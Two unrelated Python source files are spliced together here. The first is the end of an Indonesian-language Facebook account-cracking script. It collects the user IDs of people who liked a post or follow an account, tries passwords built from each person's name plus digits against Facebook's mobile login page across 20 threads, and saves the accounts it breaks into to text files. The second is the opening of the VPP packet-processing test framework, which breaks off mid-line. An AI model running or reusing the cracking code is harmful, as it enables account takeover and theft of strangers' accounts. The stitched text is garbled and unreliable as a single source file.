if 'checkpoint' in xo:
print '\033[0;95m[Cekpoint]\033[0;97m '+em+' \033[0;95m∆\033[0;97m '+px4
cek = open('done/usa.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+px4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;95mSelesai ...'
print"\033[0;91m• \033[0;95mTotal \033[0;92mOK\033[0;97m/\x1b[0;95mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;95m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;95mCP \033[0;95mfile tersimpan \033[0;91m: \033[0;92mdone/usa.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;95mKembali\033[0;97m >")
os.system("python2 crack-2.py")
### CRACK LIKE ###
def crack_like():
global toket
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;91mID Postingan Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
r = requests.get("https://graph.facebook.com/"+idt+"/likes?limit=9999999&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
except KeyError:
print "\033[0;91m! ID postingan salah"
raw_input("\n\033[1;97m< \033[0;91mKembali \033[0;97m>")
menu()
except requests.exceptions.SSLError:
print '! Koneksi Tidak Ada'
exit()
print '\033[0;91m• \033[0;91mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;91mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;91mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;91mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN LIKE ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
pc = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pc, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pc
oke = open('done/like.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pc)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;91m[Cekpoint]\033[0;97m '+em+' \033[0;91m∆\033[0;97m '+pc
cek = open('done/like.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pc)
cek.close()
cekpoint.append(em)
else:
pc2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pc2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pc2
oke = open('done/like.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pc2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;91m[Cekpoint]\033[0;97m '+em+' \033[0;91m∆\033[0;97m '+pc2
cek = open('done/like.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pc2)
cek.close()
cekpoint.append(em)
else:
pc3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pc3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pc3
oke = open('done/like.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pc3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;91m[Cekpoint]\033[0;97m '+em+' \033[0;91m∆\033[0;97m '+pc3
cek = open('done/like.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pc3)
cek.close()
cekpoint.append(em)
else:
pc4 = v['last_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pc4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pc4
oke = open('done/like.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pc4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;91m[Cekpoint]\033[0;97m '+em+' \033[0;91m∆\033[0;97m '+pc4
cek = open('done/like.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pc4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;91mSelesai ...'
print"\033[0;91m• \033[0;91mTotal \033[0;92mOK\033[0;97m/\x1b[0;91mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;91m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;91mCP \033[0;91mfile tersimpan \033[0;91m: \033[0;92mdone/like.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;91mKembali\033[0;97m >")
os.system("python2 crack-2.py")
##### CRACK FOLLOW #####
def crack_follow():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;93m1.\033[0;97m Crack Dari Follower Saya');time.sleep(0.07)
print ('\033[0;93m2.\033[0;97m Crack Dari Follower Teman');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_follow()
#### PILIH FOLLOW ####
def pilih_follow():
keak = raw_input('\033[0;93m>\033[0;97m ')
if keak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_follow()
elif keak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/subscribers?limit=999999&access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif keak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;93mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;93m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;93mKembali \033[0;97m>")
crack_follow()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=999999&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif keak =="0":
menu()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_follow()
print '\033[0;91m• \033[0;93mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;93mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;93mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;93mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN FOLLOW ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
pr = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pr, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pr
oke = open('done/follow.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pr)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;93m[Cekpoint]\033[0;97m '+em+' \033[0;93m∆\033[0;97m '+pr
cek = open('done/follow.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pr)
cek.close()
cekpoint.append(em)
else:
pr2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pr2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pr2
oke = open('done/follow.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pr2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;93m[Cekpoint]\033[0;97m '+em+' \033[0;93m∆\033[0;97m '+pr2
cek = open('done/follow.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pr2)
cek.close()
cekpoint.append(em)
else:
pr3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pr3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pr3
oke = open('done/follow.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pr3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;93m[Cekpoint]\033[0;97m '+em+' \033[0;93m∆\033[0;97m '+pr3
cek = open('done/follow.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pr3)
cek.close()
cekpoint.append(em)
else:
pr4 = v['first_name']+'321'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pr4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pr4
oke = open('done/follow.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pr4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;93m[Cekpoint]\033[0;97m '+em+' \033[0;93m∆\033[0;97m '+pr4
cek = open('done/follow.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pr4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;93mSelesai ...'
print"\033[0;91m• \033[0;93mTotal \033[0;92mOK\033[0;97m/\x1b[0;93mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;93m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;93mCP \033[0;93mfile tersimpan \033[0;91m: \033[0;92mdone/follow.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;93mKembali\033[0;97m >")
os.system("python2 crack-2.py")
#### CARI ID ####
def cari_id():
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
ling = ('https://www.facebook.com/')
url = ling+raw_input("\033[0;91m• \033[0;93mUsername \033[0;91m:\033[0;92m ")
idre = re.compile('"entity_id":"([0-9]+)"')
page = requests.get(url)
nex = idre.findall(page.content)
for hasil in nex:
print '\n'+'\033[0;91m• \033[0;93mID Anda\033[0;91m :\033[0;92m '+hasil
raw_input("\n\033[0;97m< \033[0;92mKembali \033[0;97m>")
menu()
### HASIL CRACK ###
def hasil_crack():
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;92m1. \033[0;97mLihat Hasil Crack Indonesia');time.sleep(0.07)
print ('\033[0;92m2. \033[0;97mLihat Hasil Crack Bangladesh');time.sleep(0.07)
print ('\033[0;92m3. \033[0;97mLihat Hasil Crack Pakistan');time.sleep(0.07)
print ('\033[0;92m4. \033[0;97mLihat Hasil Crack Usa');time.sleep(0.07)
print ('\033[0;92m5. \033[0;97mLihat Hasil Crack Like');time.sleep(0.07)
print ('\033[0;92m6. \033[0;97mLihat Hasil Crack Follow');time.sleep(0.07)
print ('\033[0;91m0. \033[0;97mKembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_hasil()
### PILIH HASIL ###
def pilih_hasil():
keak = raw_input('\033[0;92m>\033[0;97m ')
if keak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_hasil()
elif keak =="1":
os.system('xdg-open done/indo.txt')
hasil_crack()
elif keak =="2":
os.system('xdg-open done/bangla.txt')
hasil_crack()
elif keak =="3":
os.system('xdg-open done/bangla.txt')
hasil_crack()
elif keak =="4":
os.system('xdg-open done/pakis.txt')
hasil_crack()
elif keak =="5":
os.system('xdg-open done/usa.txt')
hasil_crack()
elif keak =="6":
os.system('xdg-open done/like.txt')
hasil_crack()
elif keak =="7":
os.system('xdg-open done/follow.txt')
hasil_crack()
elif keak =="0":
menu()
else:
print '\033[0;91mIsi Yg Benar'
### PERBARUI SCRIPT ###
def perbarui():
os.system("clear")
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
jalan ("\033[0;92mMemperbarui Script ...\033[0;93m")
os.system("git pull origin master")
raw_input("\n\033[0;97m<\033[0;92m Kembali \033[0;97m>")
os.system("python2 crack-2.py")
if __name__=='__main__':
menu()
masuk()
|
#!/usr/bin/env python3
from __future__ import print_function
import gc
import sys
import os
import select
import signal
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_shmem import VppTransportShmemIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
if os.name == 'posix' and sys.version_info[0] < 3:
# using subprocess32 is recommended by python official documentation
# @ https://docs.python.org/2/library/subprocess.html
import subprocess32 as subprocess
else:
import subprocess
# Python2/3 compatible
try:
input = raw_input
except NameError:
pass
# Test outcome codes used by the framework's result reporting.
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
class BoolEnvironmentVariable(object):
    """Lazily evaluated boolean view of an environment variable.

    The variable is read from the environment on every truth test, so a
    change to the environment after construction is picked up.  The value
    is considered true when its lower-cased text is one of ``true_values``.
    """

    def __init__(self, env_var_name, default='n', true_values=None):
        self.name = env_var_name
        self.default = default
        if true_values is None:
            true_values = ("y", "yes", "1")
        self.true_values = true_values

    def __bool__(self):
        # re-read the environment each time; fall back to the default text
        value = os.getenv(self.name, self.default)
        return value.lower() in self.true_values

    if sys.version_info[0] == 2:
        # Python 2 spells the truth-test hook differently
        __nonzero__ = __bool__

    def __repr__(self):
        return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
            (self.name, self.default, self.true_values)
# TEST_DEBUG enables framework self-debugging; the (project-local)
# debug_internal module is only imported when the flag is set.
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
    import debug_internal

# NOTE(review): this triple-quoted string is a bare no-op expression, not
# the module docstring (it is not the first statement of the file); kept
# byte-identical here.
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
    """ exception for reporting that the subprocess has died.

    :param rv: return code of the dead process; the negated value is looked
        up as a signal number (POSIX convention for signal death).
    :param testcase: name of the testcase being run, for the message.
    :param method_name: name of the test method being run, for the message.
    """

    # map signal numbers back to their SIG* names (skip SIG_* constants)
    signals_by_value = {v: k for k, v in signal.__dict__.items() if
                        k.startswith('SIG') and not k.startswith('SIG_')}

    def __init__(self, rv=None, testcase=None, method_name=None):
        self.rv = rv
        self.signal_name = None
        self.testcase = testcase
        self.method_name = method_name

        try:
            # rv is negative when the process was killed by a signal
            self.signal_name = VppDiedError.signals_by_value[-rv]
        except (KeyError, TypeError):
            # unknown signal number, or rv is None
            pass

        if testcase is None and method_name is None:
            in_msg = ''
        else:
            in_msg = 'running %s.%s ' % (testcase, method_name)

        # BUGFIX: use %s instead of %d for the return code -- rv defaults to
        # None and "%d" % None raises TypeError, masking the real error.
        msg = "VPP subprocess died %sunexpectedly with return code: %s%s." % (
            in_msg,
            self.rv,
            ' [%s]' % (self.signal_name if
                       self.signal_name is not None else ''))
        super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
    """ pump output from vpp stdout/stderr to proper queues

    Runs in a dedicated thread until testclass.pump_thread_stop_flag is
    set.  Uses select() over vpp's stdout/stderr plus a wakeup pipe so the
    thread can be unblocked when it is time to stop.  Partial lines (reads
    that do not end in a newline) are carried over in *_fragment and glued
    to the front of the next read, so the deques only ever hold whole
    lines plus at most one trailing fragment.
    """
    stdout_fragment = ""
    stderr_fragment = ""
    while not testclass.pump_thread_stop_flag.is_set():
        readable = select.select([testclass.vpp.stdout.fileno(),
                                  testclass.vpp.stderr.fileno(),
                                  testclass.pump_thread_wakeup_pipe[0]],
                                 [], [])[0]
        if testclass.vpp.stdout.fileno() in readable:
            read = os.read(testclass.vpp.stdout.fileno(), 102400)
            if len(read) > 0:
                split = read.decode('ascii',
                                    errors='backslashreplace').splitlines(True)
                # prepend the leftover partial line from the previous read
                if len(stdout_fragment) > 0:
                    split[0] = "%s%s" % (stdout_fragment, split[0])
                if len(split) > 0 and split[-1].endswith("\n"):
                    limit = None
                else:
                    # last piece is an incomplete line - keep it for later
                    limit = -1
                    stdout_fragment = split[-1]
                testclass.vpp_stdout_deque.extend(split[:limit])
                if not testclass.cache_vpp_output:
                    for line in split[:limit]:
                        testclass.logger.debug(
                            "VPP STDOUT: %s" % line.rstrip("\n"))
        if testclass.vpp.stderr.fileno() in readable:
            read = os.read(testclass.vpp.stderr.fileno(), 102400)
            if len(read) > 0:
                split = read.decode('ascii',
                                    errors='backslashreplace').splitlines(True)
                # prepend the leftover partial line from the previous read
                if len(stderr_fragment) > 0:
                    split[0] = "%s%s" % (stderr_fragment, split[0])
                if len(split) > 0 and split[-1].endswith("\n"):
                    limit = None
                else:
                    # last piece is an incomplete line - keep it for later
                    limit = -1
                    stderr_fragment = split[-1]
                testclass.vpp_stderr_deque.extend(split[:limit])
                if not testclass.cache_vpp_output:
                    for line in split[:limit]:
                        testclass.logger.debug(
                            "VPP STDERR: %s" % line.rstrip("\n"))
        # ignoring the dummy pipe here intentionally - the
        # flag will take care of properly terminating the loop
def _is_skip_aarch64_set():
    """Return a lazily-evaluated truthy wrapper for SKIP_AARCH64."""
    flag = BoolEnvironmentVariable('SKIP_AARCH64')
    return flag


is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
    """Return a lazily-evaluated truthy wrapper for EXTENDED_TESTS."""
    flag = BoolEnvironmentVariable("EXTENDED_TESTS")
    return flag


running_extended_tests = _running_extended_tests()
def _running_on_centos():
os_id = os.getenv("OS_ID", "")
return True if "centos" in os_id.lower() else False
running_on_centos = _running_on_centos()
class KeepAliveReporter(object):
    """
    Singleton object which reports test start to parent process

    Implemented Borg-style: every instance shares one state dict, so the
    pipe set on one instance is visible through all of them.
    NOTE(review): __init__ resets _pipe to None on every construction;
    preserved exactly as in the original.
    """
    _shared_state = {}

    def __init__(self):
        self.__dict__ = self._shared_state
        self._pipe = None

    @property
    def pipe(self):
        """The keep-alive pipe, or None when not running forked."""
        return self._pipe

    @pipe.setter
    def pipe(self, pipe):
        if self._pipe is None:
            self._pipe = pipe
        else:
            raise Exception("Internal error - pipe should only be set once.")

    def send_keep_alive(self, test, desc=None):
        """
        Write current test tmpdir & desc to keep-alive pipe to signal liveness
        """
        if self.pipe is None:
            # not running forked - there is no parent to notify
            return
        if isclass(test):
            payload_desc = '%s (%s)' % (desc, unittest.util.strclass(test))
        else:
            payload_desc = test.id()
        self.pipe.send((payload_desc, test.vpp_bin, test.tempdir,
                        test.vpp.pid))
class VppTestCase(unittest.TestCase):
    """This subclass is a base class for VPP test cases that are implemented as
    classes. It provides methods to create and run test case.
    """

    # extra VPP config lines appended by subclasses; punt config may be
    # set to None by a subclass to suppress it (checked in setUpConstants)
    extra_vpp_punt_config = []
    extra_vpp_plugin_config = []
@property
def packet_infos(self):
    """List of packet infos"""
    # backing attribute is initialised elsewhere in the class
    # (reset_packet_infos, not visible in this chunk) -- read-only here
    return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def instance(cls):
    """Return the instance of this testcase"""
    # cls.test_instance is assigned elsewhere in the framework (not
    # visible in this chunk) -- presumably when the testcase starts
    return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@staticmethod
def get_least_used_cpu():
    """Pick a CPU with the fewest running vpp_main processes.

    Buckets CPUs by how many 'vpp_main' processes currently run on them
    (bucket 0 = unused, bucket 1 = one vpp on it, ...), then returns a
    random CPU from the least-loaded non-empty bucket.
    """
    # bucket list: index == number of vpp_main processes seen on the CPU
    cpu_usage_list = [set(range(psutil.cpu_count()))]
    vpp_processes = [p for p in psutil.process_iter(attrs=['pid', 'name'])
                     if 'vpp_main' == p.info['name']]
    for vpp_process in vpp_processes:
        for cpu_usage_set in cpu_usage_list:
            try:
                cpu_num = vpp_process.cpu_num()
                if cpu_num in cpu_usage_set:
                    # move the CPU one bucket up (one more vpp on it)
                    cpu_usage_set_index = cpu_usage_list.index(
                        cpu_usage_set)
                    if cpu_usage_set_index == len(cpu_usage_list) - 1:
                        cpu_usage_list.append({cpu_num})
                    else:
                        cpu_usage_list[cpu_usage_set_index + 1].add(
                            cpu_num)
                    cpu_usage_set.remove(cpu_num)
                    break
            except psutil.NoSuchProcess:
                # process exited while we were iterating - ignore it
                pass

    # first non-empty bucket holds the least-used CPUs
    for cpu_usage_set in cpu_usage_list:
        if len(cpu_usage_set) > 0:
            min_usage_set = cpu_usage_set
            break

    return random.choice(tuple(min_usage_set))
@classmethod
def setUpConstants(cls):
    """ Set-up the test case class based on environment variables

    Reads STEP, DEBUG, CACHE_OUTPUT, VPP_BIN, VPP_PLUGIN_PATH,
    VPP_TEST_PLUGIN_PATH, EXTERN_PLUGINS and COREDUMP_SIZE, then builds
    cls.vpp_cmdline - the full argument vector used to launch VPP.
    """
    cls.step = BoolEnvironmentVariable('STEP')
    d = os.getenv("DEBUG", None)
    # inverted case to handle '' == True
    c = os.getenv("CACHE_OUTPUT", "1")
    cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
    cls.set_debug_flags(d)
    cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
    cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
    cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
    cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
    # combine built-in and external plugin paths when both are present
    plugin_path = None
    if cls.plugin_path is not None:
        if cls.extern_plugin_path is not None:
            plugin_path = "%s:%s" % (
                cls.plugin_path, cls.extern_plugin_path)
        else:
            plugin_path = cls.plugin_path
    elif cls.extern_plugin_path is not None:
        plugin_path = cls.extern_plugin_path
    debug_cli = ""
    if cls.step or cls.debug_gdb or cls.debug_gdbserver:
        # interactive debugging needs a CLI listener to attach to
        debug_cli = "cli-listen localhost:5002"
    coredump_size = None
    size = os.getenv("COREDUMP_SIZE")
    if size is not None:
        coredump_size = "coredump-size %s" % size
    if coredump_size is None:
        coredump_size = "coredump-size unlimited"
    cpu_core_number = cls.get_least_used_cpu()
    if not hasattr(cls, "worker_config"):
        cls.worker_config = ""
    # dpdk/rdma are disabled (tests use packet-generator interfaces);
    # the unittest plugin is enabled explicitly
    cls.vpp_cmdline = [cls.vpp_bin, "unix",
                       "{", "nodaemon", debug_cli, "full-coredump",
                       coredump_size, "runtime-dir", cls.tempdir, "}",
                       "api-trace", "{", "on", "}", "api-segment", "{",
                       "prefix", cls.shm_prefix, "}", "cpu", "{",
                       "main-core", str(cpu_core_number),
                       cls.worker_config, "}",
                       "statseg", "{", "socket-name", cls.stats_sock, "}",
                       "socksvr", "{", "socket-name", cls.api_sock, "}",
                       "plugins",
                       "{", "plugin", "dpdk_plugin.so", "{", "disable",
                       "}", "plugin", "rdma_plugin.so", "{", "disable",
                       "}", "plugin", "unittest_plugin.so", "{", "enable",
                       "}"] + cls.extra_vpp_plugin_config + ["}", ]
    if cls.extra_vpp_punt_config is not None:
        cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
    if plugin_path is not None:
        cls.vpp_cmdline.extend(["plugin_path", plugin_path])
    if cls.test_plugin_path is not None:
        cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
    cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
    cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
    """Pause after spawning VPP so a debugger can be attached.

    In gdb/gdbserver debug modes, print attach instructions and block on
    input() until the user presses ENTER; otherwise just log the PID and
    return immediately.
    """
    if cls.debug_gdbserver:
        print(double_line_delim)
        print("Spawned GDB server with PID: %d" % cls.vpp.pid)
    elif cls.debug_gdb:
        print(double_line_delim)
        print("Spawned VPP with PID: %d" % cls.vpp.pid)
    else:
        # no debugging requested - nothing to wait for
        cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
        return
    print(single_line_delim)
    print("You can debug VPP using:")
    if cls.debug_gdbserver:
        print("sudo gdb " + cls.vpp_bin +
